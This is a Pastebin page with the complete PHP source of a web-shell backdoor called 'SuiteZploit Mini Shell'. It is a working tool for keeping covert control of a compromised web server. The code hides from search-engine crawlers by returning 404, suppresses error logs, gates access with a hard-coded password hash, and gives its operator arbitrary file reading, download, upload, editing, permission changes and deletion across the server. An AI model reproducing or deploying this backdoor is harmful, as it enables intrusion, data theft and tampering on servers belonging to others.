API tools faq
paste
Advertisement
Atsal

Untitled

Atsal
Jan 5th, 2019
104
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 11.30 KB | None | 0 0
raw download clone embed print report
  1. <?php
  2. ///////////////////////////////////////////////////////////////////////
  3. // SuiteZploit Mini Shell Backdoor //
  4. // Coder : A7SL //
  5. // Version : 1.1 //
  6. // Team : SuiteZploit //
  7. // Site : https://www.suitezploit.me/ //
  8. // Facebook : https://www.facebook.com/atsal.go.id //
  9. ///////////////////////////////////////////////////////////////////////
  10. session_start();
  11. error_reporting(0);
  12. set_time_limit(0);
  13. @set_magic_quotes_runtime(0);
  14. @clearstatcache();
  15. @ini_set('error_log',NULL);
  16. @ini_set('log_errors',0);
  17. @ini_set('max_execution_time',0);
  18. @ini_set('output_buffering',0);
  19. @ini_set('display_errors', 0);
  20. $auth_pass = "b43f8c3c30ea0a3ef2f7bbcab1326ff7"; // pw : suitezploit
  21. $errorforbidden = $_SERVER['REQUEST_URI'];
  22. $color = "#00ff00";
  23. $default_action = 'FilesMan';
  24. $default_use_ajax = true;
  25. $default_charset = 'UTF-8';
  26. if(!empty($_SERVER['HTTP_USER_AGENT'])) {
  27. $userAgents = array("Googlebot", "Slurp", "MSNBot", "PycURL", "facebookexternalhit", "ia_archiver", "crawler", "Yandex", "Rambler", "Yahoo! Slurp", "YahooSeeker", "bingbot");
  28. if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) {
  29. header('HTTP/1.0 404 Not Found');
  30. exit;
  31. }
  32. }
  33.  
  34. function login_shell() {
  35. ?>
  36. <?php
  37. $errorforbidden = $_SERVER['REQUEST_URI'];
  38. $masuk = '<style> input { margin:0;background-color:#fff;border:1px solid #fff; }</style>
  39. <center><form method="post"><input type="password" name="pass"></form></center>';
  40. ?>
  41. <html>
  42. <head>
  43. <title>Shellnya Orang Ganteng</title>
  44. <style type="text/css">
  45. html {
  46. margin: 20px auto;
  47. background: #24292D;
  48. color: white;
  49. text-align: center;
  50. }
  51. header {
  52. color: white;
  53. margin: 10PX auto;
  54. }
  55. input[type=password] {
  56. width: 200px;
  57. height: 25px;
  58. color: green;
  59. background: #24292D;
  60. border: 1px;
  61. padding: 5px;
  62. margin-left: 20px;
  63. text-align: center;
  64. }
  65. </style>
  66. </head>
  67. <center>
  68. <br><br><br>
  69. <?php print $masuk; ?>
  70. <?php
  71. exit;
  72. }
  73. if(!isset($_SESSION[md5($_SERVER['HTTP_HOST'])]))
  74. if( empty($auth_pass) || ( isset($_POST['pass']) && (md5($_POST['pass']) == $auth_pass) ) )
  75. $_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
  76. else
  77. login_shell();
  78. if(isset($_GET['file']) && ($_GET['file'] != '') && ($_GET['act'] == 'download')) {
  79. @ob_clean();
  80. $file = $_GET['file'];
  81. header('Content-Description: File Transfer');
  82. header('Content-Type: application/octet-stream');
  83. header('Content-Disposition: attachment; filename="'.basename($file).'"');
  84. header('Expires: 0');
  85. header('Cache-Control: must-revalidate');
  86. header('Pragma: public');
  87. header('Content-Length: ' . filesize($file));
  88. readfile($file);
  89. exit;
  90. }
  91. echo '<!DOCTYPE HTML>
  92. <html>
  93. <head>
  94. <link href="" rel="stylesheet" type="text/css">
  95. <title>SuiteZploit Mini Shell</title>
  96. <style>
  97. body{
  98. font-family: "Racing Sans One", cursive;
  99. background-color: #24292D;
  100. color:white;
  101. }
  102. background-color: #24292D;
  103. color:white;
  104. }
  105. input type=submit {
  106. background: #8C9696;
  107. color: white;
  108. }
  109. #content tr:hover{
  110. background-color: #8C9696;
  111. color:white;
  112. }
  113. #content .first{
  114. background-color: #8C9696;
  115. color:white;
  116. }
  117. table{
  118. border: 1px #000000 dotted;
  119. }
  120. a{
  121. color:white;
  122. text-decoration: none;
  123. }
  124. a:hover{
  125. color:white;
  126. }
  127. input,select,textarea{
  128. border: 1px #000000 solid;
  129. -moz-border-radius: 5px;
  130. -webkit-border-radius:5px;
  131. border-radius:5px;
  132. }
  133. </style>
  134. </head>
  135. <body>
  136. <h1><center><font color="white">SuiteZploit</font></center></h1>
  137. <table width="100%" class="table_home" border="0" cellpadding="3" cellspacing="1" align="center">
  138. <tr><td><font color="white"><center></font> ';
  139. if(isset($_GET['path'])){
  140. $path = $_GET['path'];
  141. }else{
  142. $path = getcwd();
  143. }
  144. $path = str_replace('\\','/',$path);
  145. $paths = explode('/',$path);
  146.  
  147. foreach($paths as $id=>$pat){
  148. if($pat == '' && $id == 0){
  149. $a = true;
  150. echo '<a href="?path=/">/</a>';
  151. continue;
  152. }
  153. if($pat == '') continue;
  154. echo '<a href="?path=';
  155. for($i=0;$i<=$id;$i++){
  156. echo "$paths[$i]";
  157. if($i != $id) echo "/";
  158. }
  159. echo '">'.$pat.'</a>/';
  160. }
  161. echo '</td></tr><tr><td>';
  162. if(isset($_FILES['file'])){
  163. if(copy($_FILES['file']['tmp_name'],$path.'/'.$_FILES['file']['name'])){
  164. echo '<center>';
  165. echo '<font color="green">Success</font><br />';
  166. }else{
  167. echo '<font color="red">Failed</font><br/>';
  168. }
  169. }
  170. echo '<form enctype="multipart/form-data" method="POST">
  171. <font color="white"><center></font> <input type="file" name="file" />
  172. <input type="submit" value="upload" />
  173. </form>';
  174. echo '</td></tr>';
  175. if(isset($_GET['filesrc'])){
  176. echo "<tr><td>Current File : ";
  177. echo $_GET['filesrc'];
  178. echo '</tr></td></table><br />';
  179. echo('<pre>'.htmlspecialchars(file_get_contents($_GET['filesrc'])).'</pre>');
  180. }elseif(isset($_GET['option']) && $_POST['opt'] != 'delete'){
  181. echo '</table><br /><center>'.$_POST['path'].'<br /><br />';
  182. if($_POST['opt'] == 'chmod'){
  183. if(isset($_POST['perm'])){
  184. if(chmod($_POST['path'],$_POST['perm'])){
  185. echo '<font color="green">Success</font><br/>';
  186. }else{
  187. echo '<font color="red">Failed</font><br />';
  188. }
  189. }
  190. echo '<form method="POST">
  191. Permission : <input name="perm" type="text" size="4" value="'.substr(sprintf('%o', fileperms($_POST['path'])), -4).'" />
  192. <input type="hidden" name="path" value="'.$_POST['path'].'">
  193. <input type="hidden" name="opt" value="chmod">
  194. <input type="submit" value="Go" />
  195. </form>';
  196. }elseif($_POST['opt'] == 'rename'){
  197. if(isset($_POST['newname'])){
  198. if(rename($_POST['path'],$path.'/'.$_POST['newname'])){
  199. echo '<font color="green">Success</font><br/>';
  200. }else{
  201. echo '<font color="red">Failed</font><br />';
  202. }
  203. $_POST['name'] = $_POST['newname'];
  204. }
  205. echo '<form method="POST">
  206. New Name : <input name="newname" type="text" size="20" value="'.$_POST['name'].'" />
  207. <input type="hidden" name="path" value="'.$_POST['path'].'">
  208. <input type="hidden" name="opt" value="rename">
  209. <input type="submit" value="Go" />
  210. </form>';
  211. }elseif($_POST['opt'] == 'edit'){
  212. if(isset($_POST['src'])){
  213. $fp = fopen($_POST['path'],'w');
  214. if(fwrite($fp,$_POST['src'])){
  215. echo '<font color="green">Success</font><br/>';
  216. }else{
  217. echo '<font color="red">Failed</font><br/>';
  218. }
  219. fclose($fp);
  220. }
  221. echo '<form method="POST">
  222. <textarea cols=80 rows=20 name="src">'.htmlspecialchars(file_get_contents($_POST['path'])).'</textarea><br />
  223. <input type="hidden" name="path" value="'.$_POST['path'].'">
  224. <input type="hidden" name="opt" value="edit">
  225. <input type="submit" value="Save" />
  226. </form>';
  227. }
  228. echo '</center>';
  229. }else{
  230. echo '</table><br/><center>';
  231. if(isset($_GET['option']) && $_POST['opt'] == 'delete'){
  232. if($_POST['type'] == 'dir'){
  233. if(rmdir($_POST['path'])){
  234. echo '<font color="green">Success</font><br/>';
  235. }else{
  236. echo '<font color="red">Failed </font><br/>';
  237. }
  238. }elseif($_POST['type'] == 'file'){
  239. if(unlink($_POST['path'])){
  240. echo '<font color="green">Success</font><br/>';
  241. }else{
  242. echo '<font color="red">Failed</font><br/>';
  243. }
  244. }
  245. }
  246. echo '</center>';
  247. $scandir = scandir($path);
  248. echo '<div id="content"><table width="100%" border="0" cellpadding="3" cellspacing="1" align="center">
  249. <tr class="first">
  250. <td><center>Name</peller></center></td>
  251. <td><center>Size</peller></center></td>
  252. <td><center>Permission</peller></center></td>
  253. <td><center>Modify</peller></center></td>
  254. </tr>';
  255.  
  256. foreach($scandir as $dir){
  257. if(!is_dir($path.'/'.$dir) || $dir == '.' || $dir == '..') continue;
  258. echo '<tr>
  259. <td><a href="?path='.$path.'/'.$dir.'">'.$dir.'</a></td>
  260. <td><center>--</center></td>
  261. <td><center>';
  262. if(is_writable($path.'/'.$dir)) echo '<font color="green">';
  263. elseif(!is_readable($path.'/'.$dir)) echo '<font color="red">';
  264. echo perms($path.'/'.$dir);
  265. if(is_writable($path.'/'.$dir) || !is_readable($path.'/'.$dir)) echo '</font>';
  266.  
  267. echo '</center></td>
  268. <td><center><form method="POST" action="?option&path='.$path.'">
  269. <select name="opt">
  270. <option value="">Select</option>
  271. <option value="delete">Delete</option>
  272. <option value="chmod">Chmod</option>
  273. <option value="rename">Rename</option>
  274. </select>
  275. <input type="hidden" name="type" value="dir">
  276. <input type="hidden" name="name" value="'.$dir.'">
  277. <input type="hidden" name="path" value="'.$path.'/'.$dir.'">
  278. <input type="submit" value=">">
  279. </form></center></td>
  280. </tr>';
  281. }
  282. echo '<tr class="first"><td></td><td></td><td></td><td></td></tr>';
  283. foreach($scandir as $file){
  284. if(!is_file($path.'/'.$file)) continue;
  285. $size = filesize($path.'/'.$file)/1024;
  286. $size = round($size,3);
  287. if($size >= 1024){
  288. $size = round($size/1024,2).' MB';
  289. }else{
  290. $size = $size.' KB';
  291. }
  292.  
  293. echo '<tr>
  294. <td><a href="?filesrc='.$path.'/'.$file.'&path='.$path.'">'.$file.'</a></td>
  295. <td><center>'.$size.'</center></td>
  296. <td><center>';
  297. if(is_writable($path.'/'.$file)) echo '<font color="green">';
  298. elseif(!is_readable($path.'/'.$file)) echo '<font color="red">';
  299. echo perms($path.'/'.$file);
  300. if(is_writable($path.'/'.$file) || !is_readable($path.'/'.$file)) echo '</font>';
  301. echo '</center></td>
  302. <td><center><form method="POST" action="?option&path='.$path.'">
  303. <select name="opt">
  304. <option value="">Select</option>
  305. <option value="delete">Delete</option>
  306. <option value="chmod">Chmod</option>
  307. <option value="rename">Rename</option>
  308. <option value="edit">Edit</option>
  309. </select>
  310. <input type="hidden" name="type" value="file">
  311. <input type="hidden" name="name" value="'.$file.'">
  312. <input type="hidden" name="path" value="'.$path.'/'.$file.'">
  313. <input type="submit" value=">">
  314. </form></center></td>
  315. </tr>';
  316. }
  317. echo '</table>
  318. </div>';
  319. }
  320. echo "<font color='red'><br><tr><center><a href='?path=$path&go=xxnx'>Logout</a></center></font>";
  321. echo '</body>
  322. </html>';
  323. if($_GET['go'] == 'xxnx') {
  324.  
  325.  
  326. echo '<form action="" method="post">';
  327. unset($_SESSION[md5($_SERVER['HTTP_HOST'])]);
  328. echo '<meta http-equiv="refresh" content="3" />';
  329. }
  330. function perms($file){
  331. $perms = fileperms($file);
  332.  
  333. if (($perms & 0xC000) == 0xC000) {
  334. // Socket
  335. $info = 's';
  336. } elseif (($perms & 0xA000) == 0xA000) {
  337. // Symbolic Link
  338. $info = 'l';
  339. } elseif (($perms & 0x8000) == 0x8000) {
  340. // Regular
  341. $info = '-';
  342. } elseif (($perms & 0x6000) == 0x6000) {
  343. // Block special
  344. $info = 'b';
  345. } elseif (($perms & 0x4000) == 0x4000) {
  346. // Directory
  347. $info = 'd';
  348. } elseif (($perms & 0x2000) == 0x2000) {
  349. // Character special
  350. $info = 'c';
  351. } elseif (($perms & 0x1000) == 0x1000) {
  352. // FIFO pipe
  353. $info = 'p';
  354. } else {
  355. // Unknown
  356. $info = 'u';
  357. }
  358.  
  359. // Owner
  360. $info .= (($perms & 0x0100) ? 'r' : '-');
  361. $info .= (($perms & 0x0080) ? 'w' : '-');
  362. $info .= (($perms & 0x0040) ?
  363. (($perms & 0x0800) ? 's' : 'x' ) :
  364. (($perms & 0x0800) ? 'S' : '-'));
  365.  
  366. // Group
  367. $info .= (($perms & 0x0020) ? 'r' : '-');
  368. $info .= (($perms & 0x0010) ? 'w' : '-');
  369. $info .= (($perms & 0x0008) ?
  370. (($perms & 0x0400) ? 's' : 'x' ) :
  371. (($perms & 0x0400) ? 'S' : '-'));
  372.  
  373. // World
  374. $info .= (($perms & 0x0004) ? 'r' : '-');
  375. $info .= (($perms & 0x0002) ? 'w' : '-');
  376. $info .= (($perms & 0x0001) ?
  377. (($perms & 0x0200) ? 't' : 'x' ) :
  378. (($perms & 0x0200) ? 'T' : '-'));
  379.  
  380. return $info;
  381. }
  382. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!